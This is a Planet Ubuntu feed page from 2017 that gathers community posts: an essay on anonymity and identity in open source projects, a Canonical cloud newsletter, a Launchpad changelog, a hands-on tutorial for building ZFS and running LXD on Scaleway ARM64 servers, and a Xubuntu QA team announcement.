Most recent items from Ubuntu feeds:
Jono Bacon: Anonymous Open Source Projects from Planet Ubuntu

Today Solomon asked an interesting question on Twitter:

He made it clear he is not advocating for this view, just a thought experiment. I had, well, a few thoughts on this.

I tend to think of open source projects in three broad buckets.

Firstly, we have the overall workflow in which the community works together to build things. This is your code review processes, issue management, translations workflow, event strategy, governance, and other pieces.

Secondly, there are the individual contributions. This is how we assess what we want to build, what quality looks like, how we build modularity, and other elements.

Thirdly, there is identity which covers the identity of the project and the individuals who contribute to it. Solomon taps into this third component.

Identity

While the first two components, workflow and contributions are clearly important in defining what you want to work on and how you build it, identity is more subtle.

I think identity plays a few different roles at the individual level.

Firstly, it helps to build reputation. Open source communities are at a core level meritocracies: contributions are assessed on their value, and the overall value of the contributor is based on their merits. Now, yes, I know some of you will balk at whether open source communities are actually meritocracies. The thing is, too many people treat “meritocracy” as a framework or model: it isn’t. It is more of a philosophy…a star that we move towards.

It is impossible to build a meritocracy without some form of identity attached to the contribution. We need to have a mapping between each contribution and the same identity that delivered it: this helps that individual build their reputation as they deliver more and more contributions. This also helps them flow from being a new contributor, to a regular, and then to a leader.

This leads to my second point. Identity is also critical for accountability. Now, when I say accountability we tend to think of someone being responsible for their actions. Sure, this is the case, but accountability also plays an important and healthy role in people receiving peer feedback on their work.

According to Google Images search, “accountability” requires lots of fist bumps.
Open source communities are kinda weird places to be. It is easy to forget that (a) joining a community, (b) making a contribution, (c) asking for help, (d) having your contribution critically reviewed, and (e) solving problems, all happens out in the open, for all to see. This can be remarkably weird and stressful for people new to or unfamiliar with open source, and on a bed of the cornucopia of human insecurities about looking stupid, embarrassing yourself etc. While I have never been to one (honest), I imagine this is what it must be like going to a nudist colony: everything out on display, both good and bad.

All of this rolls up to identity playing an important role for building the fabric of a community, for effective peer review, and the overall growth of individual participants (and thus the network effect of the community).

Real Names vs. Handles

If we therefore presume identity is important, do we require that identity to be a real name (e.g. “Jono Bacon”) or a handle (e.g. “MetalDude666”)? – not my actual handle, btw.

We have all said this at some point.

In terms of the areas I presented above such as building reputation, accountability, and peer review, this can all be accomplished if people use handles, under the prerequisite that there is some way of knowing that “MetalDude666” is the same person each time. Many gaming communities have players who build remarkable reputations and accountability and no one knows who they really are, just their handles.

Where things get trickier is assuring the same quality of community experience for those who use real names and those who use handles in the same community. On core infrastructure (such as code hosting, communication channels, websites, etc) this can typically be assured. It can get trickier with areas such as real-world events. For example, if the community has an in-person event, the folks with the handles may not feel comfortable attending so as to preserve their anonymity. Given how key these kinds of events can be to building relationships, it can therefore result in a social/collaborative delta between those with real names and those with handles.

So, in answer to Solomon’s question, I do think identity is critical, but it could be all handles if required. What is key is to either (a) require only handles/real names (which is tough), or (b) provide very careful community strategy and execution to reduce the delta of experience between those with real names and handles (tough, but easier).

So, what do you think, folks? Do you agree with me, or am I speaking nonsense? Can you share great examples of anonymous of open source communities? Are there elements I missed out in my assessment here? Share them in the comments below!
The post Anonymous Open Source Projects appeared first on Jono Bacon.

about 21 hours ago

Ubuntu Insights: Cloud Chatter: April 2017 from Planet Ubuntu

Welcome to our April edition. We begin with our recent release of Ubuntu 17.04 supporting the widest range of container capabilities. We have a selection of Kubernetes webinars for you to watch, or get up to speed with some indepth tutorials. Read about our exciting partnership announcements with Oracle, City Network, AWS and Unitas Global. Discover our plans for our upcoming presence at the OpenStack Summit in Boston next month. And finally, enjoy our roundup of industry news.

Ubuntu 17.04 supports widest range of container capabilities
This month marked the 26th release of Ubuntu, entitled 17.04 Zesty Zapus, offering the most complete portfolio of container support in a Linux distribution. This includes snaps for singleton apps, LXD by Canonical for lightweight VM-style machine containers, and auto-updating Docker snap packages available in stable, candidate, beta and edge channels. The Canonical Distribution of Kubernetes 1.6, representing the very latest upstream container infrastructure, has 100% compatibility with Google’s hosted Kubernetes service GKE.
Ubuntu 17.04 also includes OpenStack’s latest Ocata release, which is also available on Ubuntu 16.04 LTS via Canonical’s public Cloud Archive. Canonical’s OpenStack offering supports upgrades of running clouds without workload interruption. The introduction of Cells v2 in this release ensures that new clouds have a consistent way to scale from small to very large as capacity requirements change.
Furthermore there is increased network performance for clouds and guests with the Linux 4.10 kernel. Learn more

GPUs and Kubernetes for Deep Learning
The Canonical Distribution of Kubernetes is the only distribution that natively supports GPUs, making it ideal for managing Deep Learning and Media workloads. Our latest webinar discusses how such artificial intelligence can be achieved using Kubernetes, nVidia GPUs, and the operation toolbox provided by Canonical. Watch the webinar
Get up and running with Kubernetes
Our Kubernetes webinar series will be covering a range of operational tasks over the next few months. These will include upgrades, backups, snapshots, scalability, and other operational concerns that will allow you to completely manage your Kubernetes cluster(s) with confidence. The available webinars in the series so far include:

Getting started with the Canonical Distribution of Kubernetes – watch on-demand
Learn the secrets of validation and testing your Kubernetes cluster – watch on-demand
Painless Kubernetes upgrades – register now

Unitas Global and Canonical provide Fully-Managed Enterprise OpenStack
Unitas Global, the leading enterprise hybrid cloud solution provider, and Canonical, announced they will provide a new fully managed and hosted OpenStack private cloud to enterprise clients around the world. This partnership along with Unitas Global’s large ecosystem of system integrators and partners will enable customers to choose an end to end infrastructure solution to design, build, and integrate custom private cloud infrastructure based on OpenStack. Learn more
OpenStack public cloud, from Stockholm to Dubai and everywhere between
City Network, a leading European provider of OpenStack infrastructure-as-a-service (IaaS) has joined the Ubuntu Certified Public Cloud programme. Through its public cloud service ‘City Cloud’, companies across the globe can purchase server and storage capacity as needed, paying for the capacity they use and leveraging the flexibility and scalability of the OpenStack-platform. With dedicated and OpenStack-based City Cloud nodes in the US. Europe and Asia, City Network also recently launched in Dubai. Learn more.
Certified Ubuntu Images available on Oracle Bare Metal Cloud Service
Certified Ubuntu images are now available in the Oracle Bare Metal Cloud Services, providing developers with compute options ranging from single to 16 OCPU virtual machines (VMs) to high-performance, dedicated bare metal compute instances. This is in addition to the image already offered on Oracle Compute Cloud Service and maintains the ability for enterprises to add Canonical-backed Ubuntu Advantage Support and Systems Management. Oracle and Canonical customers now have access to the latest Ubuntu features, compliance accreditations and security updates. Learn more
Ubuntu on AWS gets serious performance boost with AWS-tuned kernel
Ubuntu Cloud Images for Amazon have been enabled with the AWS-tuned Ubuntu kernel by default. The AWS-tuned Ubuntu kernel will receive the same level of support and security maintenance as all supported Ubuntu kernels for the duration of the Ubuntu 16.04 LTS. The most notable highlights for this kernel include: Up to 30% faster kernel boot speeds, full support for Elastic Network Adapter (ENA), increased I/O performance for i3 instances and more! Learn more
Ubuntu 12.04 goes end-of-life
Following the end-of-life of Ubuntu 12.04 LTS on Fri tomorrow,, April 28, 2017, Canonical is offering Ubuntu 12.04 ESM (Extended Security Maintenance), which provides important security fixes for the kernel and the most essential user space packages in Ubuntu 12.04. These updates are delivered in a secure, private archive exclusively available to Ubuntu Advantage customers on a per-node or per hour basis.
For more information, read our FAQs or watch our latest webinar.

Preparing for a great show at OpenStack Summit Boston
We’ll be in Boston, from the 7th-12th May, at the OpenStack Summit. Join us at the Ubuntu booth and talk with us about your business’s cloud needs or find out about our cloud and container solutions, from LXD to Docker and Kubernetes with our featured demos. We’ll also be running some hands-on Telco and Container-specific workshops, as well as delivering a range of informative speaking sessions within the summit agenda. Book a meeting with our Executive Team or learn more about what we have planned.
Section 4: Top posts from Insights

[News] Scalable, Secure Access to Data with DBaaS on IBM LinuxONE
[Blog] General availability of Kubernetes 1.6 on Ubuntu
[Tutorial] How we commoditized GPUs for Kubernetes
[Whitepaper] The no-nonsense way to accelerate your business with containers
[eBook] What IT pros need to know about server provisioning
[Video tutorial] How to install MAAS on your machine

OpenStack, SDN & NFV

How robots will retool the server industry
What’s new in OpenStack Ocata
OPNFV, the Open Source Project for Integrated Testing of Full, Next-Generation Networking Stack, Issues its Fourth Release

Containers & Storage

Is it time to buy into container management platforms
Enterprise container DevOps steps up its game with Kubernetes 1.6
The major changes that make Docker container services enterprise-ready

Big data / Machine Learning / Deep Learning

New AI Chips to Give GPUs a Run for Deep Learning Money
Will the cloud save big data?
Why Securing Big Data is a Big Deal

about 22 hours ago

Launchpad News: Launchpad news, November 2015 – April 2017 from Planet Ubuntu

Well, it’s been a while!  Since we last posted a general update, the Launchpad team has become part of Canonical’s Online Services department, so some of our efforts have gone into other projects.  There’s still plenty happening with Launchpad, though, and here’s a changelog-style summary of what we’ve been up to.

Answers

Lock down question title and description edits from random users
Prevent answer contacts from editing question titles and descriptions
Prevent answer contacts from editing FAQs

Blueprints

Optimise SpecificationSet.getStatusCountsForProductSeries, fixing Product:+series timeouts
Add sprint deletion support (#2888)
Restrict blueprint count on front page to public blueprints

Build farm

Add fallback if nominated architecture-independent architecture is unavailable for building (#1530217)
Try to load the nbd module when starting launchpad-buildd (#1531171)
Default LANG/LC_ALL to C.UTF-8 during binary package builds (#1552791)
Convert buildd-manager to use a connection pool rather than trying to download everything at once (#1584744)
Always decode build logtail as UTF-8 rather than guessing (#1585324)
Move non-virtualised builders to the bottom of /builders; Ubuntu is now mostly built on virtualised builders
Pass DEB_BUILD_OPTIONS=noautodbgsym during binary package builds if we have not been told to build debug symbols (#1623256)

Bugs

Use standard milestone ordering for bug task milestone choices (#1512213)
Make bug activity records visible to anonymous API requests where appropriate (#991079)
Use a monospace font for “Add comment” boxes for bugs, to match how the comments will be displayed (#1366932)
Fix BugTaskSet.createManyTasks to map Incomplete to its storage values (#1576857)
Add basic GitHub bug linking (#848666)
Prevent rendering of private team names in bugs feed (#1592186)
Update CVE database XML namespace to match current file on cve.mitre.org
Fix Bugzilla bug watches to support new versions that permit multiple aliases
Sort bug tasks related to distribution series by series version rather than series name (#1681899)

Code

Remove always-empty portlet from Person:+branches (#1511559)
Fix OOPS when editing a Git repository with over a thousand refs (#1511838)
Add Git links to DistributionSourcePackage:+branches and DistributionSourcePackage:+all-branches (#1511573)
Handle prerequisites in Git-based merge proposals (#1489839)
Fix OOPS when trying to register a Git merge with a target path but no target repository
Show an “Updating repository…” indication when there are pending writes
Launchpad’s Git hosting backend is now self-hosted
Fix setDefaultRepository(ForOwner) to cope with replacing an existing default (#1524316)
Add “Configure Code” link to Product:+git
Fix Git diff generation crash on non-ASCII conflicts (#1531051)
Fix stray link to +editsshkeys on Product:+configure-code when SSH keys were already registered (#1534159)
Add support for Git recipes (#1453022)
Fix OOPS when adding a comment to a Git-based merge proposal without using AJAX (#1536363)
Fix shallow git clones over HTTPS (#1547141)
Add new “Code” portlet on Product:+index to make it easier to find source code (#531323)
Add missing table around widget row on Product:+configure-code, so that errors are highlighted properly (#1552878)
Sort GitRepositorySet.getRepositories API results to make batching reliable (#1578205)
Show recent commits on GitRef:+index
Show associated merge proposals in Git commit listings
Show unmerged and conversation-relevant Git commits in merge proposal views (#1550118)
Implement AJAX revision diffs for Git
Fix scanning branches with ghost revisions in their ancestry (#1587948)
Fix decoding of Git diffs involving non-UTF-8 text that decodes to unpaired surrogates when treated as UTF-8 (#1589411)
Fix linkification of references to Git repositories (#1467975)
Fix +edit-status for Git merge proposals (#1538355)
Include username in git+ssh URLs (#1600055)
Allow linking bugs to Git-based merge proposals (#1492926)
Make Person.getMergeProposals have a constant query count on the webservice (#1619772)
Link to the default git repository on Product:+index (#1576494)
Add Git-to-Git code imports (#1469459)
Improve preloading of {Branch,GitRepository}.{landing_candidates,landing_targets}, fixing various timeouts
Export GitRepository.getRefByPath (#1654537)
Add GitRepository.rescan method, useful in cases when a scan crashed

Infrastructure

Launchpad’s SSH endpoints (bazaar.launchpad.net, git.launchpad.net, upload.ubuntu.com, and ppa.launchpad.net) now support newer key exchange and MAC algorithms, allowing compatibility with OpenSSH >= 7.0 (#1445619)
Make cross-referencing code more efficient for large numbers of IDs (#1520281)
Canonicalise path encoding before checking a librarian TimeLimitedToken (#677270)
Fix Librarian to generate non-cachable 500s on missing storage files (#1529428)
Document the standard DELETE method in the apidoc (#753334)
Add a PLACEHOLDER account type for use by SSO-only accounts
Add support to +login for acquiring discharge macaroons from SSO via an OpenID exchange (#1572605)
Allow managing SSH keys in SSO
Re-raise unexpected HTTP errors when talking to the GPG key server
Ensure that the production dump is usable before destroying staging
Log SQL statements as Unicode to avoid confusing page rendering when the visible_render_time flag is on (#1617336)
Fix the librarian to fsync new files and their parent directories
Handle running Launchpad from a Git working tree
Handle running Launchpad on Ubuntu 16.04 (upgrade currently in progress)
Fix delete_unwanted_swift_files to not crash on segments (#1642411)
Update database schema for PostgreSQL 9.5 and 9.6
Check fingerprints of keys received from the keyserver rather than trusting it implicitly

Registry

Make public SSH key records visible to anonymous API requests (#1014996)
Don’t show unpublished packages or package names from private PPAs in search results from the package picker (#42298, #1574807)
Make Person.time_zone always be non-None, allowing us to easily show the edit widget even for users who have never set their time zone (#1568806)
Let latest questions, specifications and products be efficiently calculated
Let project drivers edit series and productreleases, as series drivers can; project drivers should have series driver power over all series
Fix misleading messages when joining a delegated team
Allow team privacy changes when referenced by CodeReviewVote.reviewer or BugNotificationRecipient.person
Don’t limit Person:+related-projects to a single batch

Snappy

Add webhook support for snaps (#1535826)
Allow deleting snaps even if they have builds
Provide snap builds with a proxy so that they can access external network resources
Add support for automatically uploading snap builds to the store (#1572605)
Update latest snap builds table via AJAX
Add option to trigger snap builds when top-level branch changes (#1593359)
Add processor selection in new snap form
Add option to automatically release snap builds to store channels after upload (#1597819)
Allow manually uploading a completed snap build to the store
Upload *.manifest files from builders as well as *.snap (#1608432)
Send an email notification for general snap store upload failures (#1632299)
Allow building snaps from an external Git repository
Move upload to FAILED if its build was deleted (e.g. because of a deleted snap) (#1655334)
Consider snap/snapcraft.yaml and .snapcraft.yaml as well as snapcraft.yaml for new snaps (#1659085)
Add support for building snaps with classic confinement (#1650946)
Fix builds_for_snap to avoid iterating over an unsliced DecoratedResultSet (#1671134)
Add channel track support when uploading snap builds to the store (contributed by Matias Bordese; #1677644)

Soyuz (package management)

Remove some more uses of the confusing .dsc component; add the publishing component to SourcePackage:+index in compensation
Add include_meta option to SPPH.sourceFileUrls, paralleling BPPH.binaryFileUrls
Kill debdiff after ten minutes or 1GiB of output by default, and make sure we clean up after it properly (#314436)
Fix handling of << and >> dep-waits
Allow PPA admins to set external_dependencies on individual binary package builds (#671190)
Fix NascentUpload.do_reject to not send an erroneous Accepted email (#1530220)
Include DEP-11 metadata in Release file if it is present
Consistently generate Release entries for uncompressed versions of files, even if they don’t exist on the filesystem; don’t create uncompressed Packages/Sources files on the filesystem
Handle Build-Depends-Arch and Build-Conflicts-Arch from SPR.user_defined_fields in Sources generation and SP:+index (#1489044)
Make index compression types configurable per-series, and add xz support (#1517510)
Use SHA-512 digests for GPG signing where possible (#1556666)
Re-sign PPAs with SHA-512
Publish by-hash index files (#1430011)
Show SHA-256 checksums rather than MD5 on DistributionSourcePackageRelease:+files (#1562632)
Add a per-series switch allowing packages in supported components to build-depend on packages in unsupported components, used for Ubuntu 16.04 and later
Expand archive signing to kernel modules (contributed by Andy Whitcroft; #1577736)
Uniquely index PackageDiff(from_source, to_source) (part of #1475358)
Handle original tarball signatures in source packages (#1587667)
Add signed checksums for published UEFI/kmod files (contributed by Andy Whitcroft; #1285919)
Add support for named authentication tokens for private PPAs
Show explicit add-apt-repository command on Archive:+index (#1547343)
Use a per-archive OOPS timeline in archivepublisher scripts
Link to package versions on DSP:+index using fmt:url rather than just a relative link to the version, to avoid problems with epochs (#1629058)
Fix RepositoryIndexFile to gzip without timestamps
Fix Archive.getPublishedBinaries API call to have a constant query count (#1635126)
Include the package name in package copy job OOPS reports and emails (#1618133)
Remove headers from Contents files (#1638219)
Notify the Changed-By address for PPA uploads if the .changes contains “Launchpad-Notify-Changed-By: yes” (#1633608)
Accept .debs containing control.tar.xz (#1640280)
Add Archive.markSuiteDirty API call to allow requesting that a given archive/suite be published
Don’t allow cron-control to interrupt publish-ftpmaster part-way through (#1647478)
Optimise non-SQL time in PublishingSet.requestDeletion (#1682096)
Store uploaded .buildinfo files (#1657704)

Translations

Allow TranslationImportQueue to import entries from file objects rather than having to read arbitrarily-large files into memory (#674575)

Miscellaneous

Use gender-neutral pronouns where appropriate
Self-host the Ubuntu webfonts (#1521472)
Make the beta and privacy banners float over the rest of the page when scrolling
Upgrade to pytz 2016.4 (#1589111)
Publish Launchpad’s code revision in an X-Launchpad-Revision header
Truncate large picker search results rather than refusing to display anything (#893796)
Sync up the lists footer with the main webapp footer a bit (#1679093)

1 day ago

Simos Xenitellis: A closer look at the new ARM64 Scaleway servers and LXD from Planet Ubuntu

Scaleway has been offering ARM (armv7) cloud servers (baremetal) since 2015 and now they have ARM64 (armv8, from Cavium) cloud servers (through KVM, not baremetal).
But can you run LXD on them? Let’s see.
Launching a new server

We go through the management panel and select to create a new server. At the moment, only the Paris datacenter has availability of ARM64 servers and we select ARM64-2GB.
They use Cavium ThunderX hardware, and those boards have up to 48 cores. You can allocate either 2, 4, or 8 cores, for 2GB, 4GB, and 8GB RAM respectively. KVM is the virtualization platform.

There is an option of either Ubuntu 16.04 or Debian Jessie. We try Ubuntu.
It takes under a minute to provision and boot the server.
Connecting to the server

It runs Linux 4.9.23. Also, the disk is vda, specifically, /dev/vda. That is, there is no partitioning and the filesystem takes over the whole device.

Here is /proc/cpuinfo and uname -a. They are the two cores (from 48) as provided by KVM. The BogoMIPS are really Bogo on these platforms, so do not take them at face value.

Currently, Scaleway does not have their own mirror of the distribution packages but use ports.ubuntu.com. It’s 16ms away (ping time).

Depending on where you are, the ping times for google.com and www.google.com tend to be different. google.com redirects to www.google.com, so it somewhat makes sense that google.com reacts faster. At other locations (different country), could be the other way round.

This is /var/log/auth.log, and already there are some hackers trying to brute-force SSH. They have been trying with username ubnt. Note to self: do not use ubnt as the username for the non-root account.
The default configuration for the SSH server on Scaleway is to allow password authentication. You need to change this at /etc/ssh/sshd_config to look like
# Change to no to disable tunnelled clear text passwords
PasswordAuthentication no
Originally, it was commented out, and had a default yes.
Finally, run
sudo systemctl reload sshd
This will not break your existing SSH session (even restart will not break your existing SSH session, how cool is that?). Now, you can create your non-root account. To get that user to sudo as root, you need to usermod -a -G sudo myusername.
There is a recovery console, accessible through the Web management screen. For this to work, it says that you first need to You must first login and set a password via SSH to use this serial console. In reality, the root account already has a password that has been set, and this password is stored in /root/.pw. It is not known how good this password is, therefore, when you boot a cloud server on Scaleway,

Disable PasswordAuthentication for SSH as shown above and reload the sshd configuration. You are supposed to have already added your SSH public key in the Scaleway Web management screen BEFORE starting the cloud server.
Change the root password so that it is not the one found at /root/.pw. Store somewhere safe that password, because it is needed if you want to connect through the recovery console
Create a non-root user that can sudo and can do PubkeyAuthentication, preferably with username other than this ubnt.

Setting up ZFS support
The Ubuntu Linux kernels at Scaleway do not have ZFS support and you need to compile as a kernel module according to the instructions at https://github.com/scaleway/kernel-tools.
Actually, those instructions are apparently now obsolete with newer versions of the Linux kernel and you need to compile both spl and zfs manually, and install.
Naturally, when you compile spl and zfs, you can create .deb packages that can be installed in a nice and clean way. However, spl and zfs will originally create .rpm packages and then call alien to convert them to .deb packages. Then, we hit on some alien bug (no pun intended) which gives the error: zfs-0.6.5.9-1.aarch64.rpm is for architecture aarch64 ; the package cannot be built on this system which is weird since we are only working on aarch64.
The running Linux kernel on Scaleway for these ARM64 SoC has the following important files, http://mirror.scaleway.com/kernel/aarch64/4.9.23-std-1/
Therefore, run as root the following:
# Determine versions
arch="$(uname -m)"
release="$(uname -r)"
upstream="${release%%-*}"
local="${release#*-}"

# Get kernel sources
mkdir -p /usr/src
wget -O "/usr/src/linux-${upstream}.tar.xz" "https://cdn.kernel.org/pub/linux/kernel/v4.x/linux-${upstream}.tar.xz"
tar xf "/usr/src/linux-${upstream}.tar.xz" -C /usr/src/
ln -fns "/usr/src/linux-${upstream}" /usr/src/linux
ln -fns "/usr/src/linux-${upstream}" "/lib/modules/${release}/build"

# Get the kernel's .config and Module.symvers files
wget -O "/usr/src/linux/.config" "http://mirror.scaleway.com/kernel/${arch}/${release}/config"
wget -O /usr/src/linux/Module.symvers "http://mirror.scaleway.com/kernel/${arch}/${release}/Module.symvers"

# Set the LOCALVERSION to the locally running local version (or edit the file manually)
printf 'CONFIG_LOCALVERSION="%s"\n' "${local:+-$local}" >> /usr/src/linux/.config

# Let's get ready to compile. The following are essential for the kernel module compilation.
apt install -y build-essential
apt install -y libssl-dev
make -C /usr/src/linux prepare modules_prepare

# Now, let's grab the latest spl and zfs (see http://zfsonlinux.org/).
cd /usr/src/
wget https://github.com/zfsonlinux/zfs/releases/download/zfs-0.6.5.9/spl-0.6.5.9.tar.gz
wget https://github.com/zfsonlinux/zfs/releases/download/zfs-0.6.5.9/zfs-0.6.5.9.tar.gz

# Install some dev packages that are needed for spl and zfs,
apt install -y uuid-dev
apt install -y dh-autoreconf
# Let's do spl first
tar xvfa spl-0.6.5.9.tar.gz
cd spl-0.6.5.9/
./autogen.sh
./configure # Takes about 2 minutes
make # Takes about 1:10 minutes
make install
cd ..

# Let's do zfs next
cd zfs-0.6.5.9/
tar xvfa zfs-0.6.5.9.tar.gz
./autogen.sh
./configure # Takes about 6:10 minutes
make # Takes about 13:20 minutes
make install

# Let's get ZFS loaded
depmod -a
ldconfig
modprobe zfs
zfs list
zpool list
And that’s it! The last two commands will show that there are no datasets or pools available (yet), meaning that it all works.
Setting up LXD
We are going to use a file (with ZFS) as the storage file. Let’s check what space we have left for this (from the 50GB disk),
root@scw-ubuntu-arm64:~# df -h /
Filesystem      Size  Used Avail Use% Mounted on
/dev/vda         46G  2.0G   42G   5% /
Initially, it was only 800MB used, now it is 2GB used. Let’s allocate 30GB for LXD.
LXD is not already installed on the Scaleway image (other VPS providers have alread LXD installed). Therefore,
apt install lxd
Then, we can run lxd init. There is a weird situation when you run lxd init. It takes quite some time for this command to show the first questions (choose storage backend, etc). In fact, it takes 1:42 minutes before you are prompted for the first question. When you subsequently run lxd init, you get at once the first question. There is quite some work that lxd init does for the first time, and I did not look into what it is.
root@scw-ubuntu-arm64:~# lxd init
Name of the storage backend to use (dir or zfs) [default=zfs]:
Create a new ZFS pool (yes/no) [default=yes]?
Name of the new ZFS pool [default=lxd]:
Would you like to use an existing block device (yes/no) [default=no]?
Size in GB of the new loop device (1GB minimum) [default=15]: 30
Would you like LXD to be available over the network (yes/no) [default=no]?
Do you want to configure the LXD bridge (yes/no) [default=yes]?
Warning: Stopping lxd.service, but it can still be activated by:
  lxd.socket

LXD has been successfully configured.
root@scw-ubuntu-arm64:~#
Now, let’s run lxc list. This will create first the client certificate. There is quite a bit of cryptography going on, and it takes a lot of time.
ubuntu@scw-ubuntu-arm64:~$ time lxc list
Generating a client certificate. This may take a minute...
If this is your first time using LXD, you should also run: sudo lxd init
To start your first container, try: lxc launch ubuntu:16.04

+------+-------+------+------+------+-----------+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+------+-------+------+------+------+-----------+

real    5m25.717s
user    5m25.460s
sys    0m0.372s
ubuntu@scw-ubuntu-arm64:~$
It is weird and warrants closer examination. In any case,
ubuntu@scw-ubuntu-arm64:~$ cat /proc/sys/kernel/random/entropy_avail
2446
ubuntu@scw-ubuntu-arm64:~$
Creating containers
Let’s create a container. We are going to do each step at a time, in order to measure the time it takes to complete.
ubuntu@scw-ubuntu-arm64:~$ time lxc image copy ubuntu:x local:
Image copied successfully!         

real    1m5.151s
user    0m1.244s
sys    0m0.200s
ubuntu@scw-ubuntu-arm64:~$
Out of the 65 seconds, 25 seconds was the time to download the image and the rest (40 seconds) was for initialization before the prompt was returned.
Let’s see how long it takes to launch a container.
ubuntu@scw-ubuntu-arm64:~$ time lxc launch ubuntu:x c1
Creating c1
Starting c1
error: Error calling 'lxd forkstart c1 /var/lib/lxd/containers /var/log/lxd/c1/lxc.conf': err='exit status 1'
  lxc 20170428125239.730 ERROR lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:220 - If you really want to start this container, set
  lxc 20170428125239.730 ERROR lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:221 - lxc.aa_allow_incomplete = 1
  lxc 20170428125239.730 ERROR lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:222 - in your container configuration file
  lxc 20170428125239.730 ERROR lxc_sync - sync.c:__sync_wait:57 - An error occurred in another process (expected sequence number 5)
  lxc 20170428125239.730 ERROR lxc_start - start.c:__lxc_start:1346 - Failed to spawn container "c1".
  lxc 20170428125240.408 ERROR lxc_conf - conf.c:run_buffer:405 - Script exited with status 1.
  lxc 20170428125240.408 ERROR lxc_start - start.c:lxc_fini:546 - Failed to run lxc.hook.post-stop for container "c1".

Try `lxc info --show-log local:c1` for more info

real    0m21.347s
user    0m0.040s
sys    0m0.048s
ubuntu@scw-ubuntu-arm64:~$
What this means, is that somehow the Scaleway Linux kernel does not have all the AppArmor (“aa”) features that LXD requires. And if we want to continue, we must configure that we are OK with this situation.
What features are missing?
ubuntu@scw-ubuntu-arm64:~$ lxc info --show-log local:c1
Name: c1
Remote: unix:/var/lib/lxd/unix.socket
Architecture: aarch64
Created: 2017/04/28 12:52 UTC
Status: Stopped
Type: persistent
Profiles: default

Log:

            lxc 20170428125239.730 WARN     lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:218 - Incomplete AppArmor support in your kernel
            lxc 20170428125239.730 ERROR    lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:220 - If you really want to start this container, set
            lxc 20170428125239.730 ERROR    lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:221 - lxc.aa_allow_incomplete = 1
            lxc 20170428125239.730 ERROR    lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:222 - in your container configuration file
            lxc 20170428125239.730 ERROR    lxc_sync - sync.c:__sync_wait:57 - An error occurred in another process (expected sequence number 5)
            lxc 20170428125239.730 ERROR    lxc_start - start.c:__lxc_start:1346 - Failed to spawn container "c1".
            lxc 20170428125240.408 ERROR    lxc_conf - conf.c:run_buffer:405 - Script exited with status 1.
            lxc 20170428125240.408 ERROR    lxc_start - start.c:lxc_fini:546 - Failed to run lxc.hook.post-stop for container "c1".
            lxc 20170428125240.409 WARN     lxc_commands - commands.c:lxc_cmd_rsp_recv:172 - Command get_cgroup failed to receive response: Connection reset by peer.
            lxc 20170428125240.409 WARN     lxc_commands - commands.c:lxc_cmd_rsp_recv:172 - Command get_cgroup failed to receive response: Connection reset by peer.

ubuntu@scw-ubuntu-arm64:~$
Two hints here, some issue with process_label_set, and get_cgroup.
Let’s allow for now, and start the container,
ubuntu@scw-ubuntu-arm64:~$ lxc config set c1 raw.lxc 'lxc.aa_allow_incomplete=1'
ubuntu@scw-ubuntu-arm64:~$ time lxc start c1

real    0m0.577s
user    0m0.016s
sys    0m0.012s
ubuntu@scw-ubuntu-arm64:~$ lxc list
+------+---------+------+------+------------+-----------+
| NAME |  STATE  | IPV4 | IPV6 |    TYPE    | SNAPSHOTS |
+------+---------+------+------+------------+-----------+
| c1   | RUNNING |      |      | PERSISTENT | 0         |
+------+---------+------+------+------------+-----------+
ubuntu@scw-ubuntu-arm64:~$ lxc list
+------+---------+-----------------------+------+------------+-----------+
| NAME |  STATE  |         IPV4          | IPV6 |    TYPE    | SNAPSHOTS |
+------+---------+-----------------------+------+------------+-----------+
| c1   | RUNNING | 10.237.125.217 (eth0) |      | PERSISTENT | 0         |
+------+---------+-----------------------+------+------------+-----------+
ubuntu@scw-ubuntu-arm64:~$
Let’s run nginx in the container.
ubuntu@scw-ubuntu-arm64:~$ lxc exec c1 -- sudo --login --user ubuntu
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

ubuntu@c1:~$ sudo apt update
Hit:1 http://ports.ubuntu.com/ubuntu-ports xenial InRelease
...
37 packages can be upgraded. Run 'apt list --upgradable' to see them.
ubuntu@c1:~$ sudo apt install nginx
...
ubuntu@c1:~$ exit
ubuntu@scw-ubuntu-arm64:~$ curl http://10.237.125.217/
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
...
ubuntu@scw-ubuntu-arm64:~$
That’s it! We are running LXD on Scaleway and their new ARM64 servers. The issues should be fixed in order to have a nicer user experience.

1 day ago

Costales: Ubuntu y otras hierbas S01E01 [videopodcast] [spanish] from Planet Ubuntu

En mi primer videopodcast el tema tiene miga: Ubuntu mata Unity y el móvil.Pulsa para ver el vídeoEnlace al videopodcast. Enlace al podcast (sólo audio).

2 days ago

Xubuntu: Xubuntu Quality Assurance team is spreading out from Planet Ubuntu

Up until the start of the 17.04 cycle the Xubuntu Quality Assurance team had been led by one person. During the last cycle, a break was needed by that person. The recent addition of Dave Pearson to the team meant we were in a position to call on someone else to lead the team.
Today, we’re pleased to announce that Dave will be carrying on as a team lead. However, starting with the artfully named Artful Aardvark cycle, we will migrate to a Quality Assurance team with two leads who will be sharing duties during development cycles.
While Dave was in control of the show during 17.04, Kev was spending more time upstream with Xfce, involving himself in testing GTK3 ports with Simon. The QA team plans to continue this split roughly from this point; Dave will be running the daily Xubuntu QA and Kev will focus more on the QA for Xfce. For the most part it is unlikely that much change will be seen by most, given that for the most part we’re quiet during a cycle (QA team notes: even if the majority of -dev mailing list posts come from us…) – other than shouting when things need you all to join in.
While it is obvious to most that there are deep connections between Xubuntu and Xfce, we hope that this change will bring more targetted testing of the new GTK3 Xfce packages. You will start to see more calls for testing of packages before they reach Xubuntu on the Xubuntu development mailing list. Case in point, the recent requests for people to test Thunar and patches direct from the Xfce Git repositories – though up until now this has come via Launchpad bug reports.
On a positive note this change has solely been possible by the creation of the Xubuntu QA Launchpad team some cycles ago. Specifically set up to allow people from the community to be brought in to the Xubuntu setup and from there become members of the Xubuntu team itself. People do get noticed on the tracker and they do get noticed on our IRC channels. Our hope is that we are able to increase the numbers of people in Xubuntu QA from the few we currently have. Increasing numbers of people involved, help us increase the quality and strength of the team directly.

2 days ago

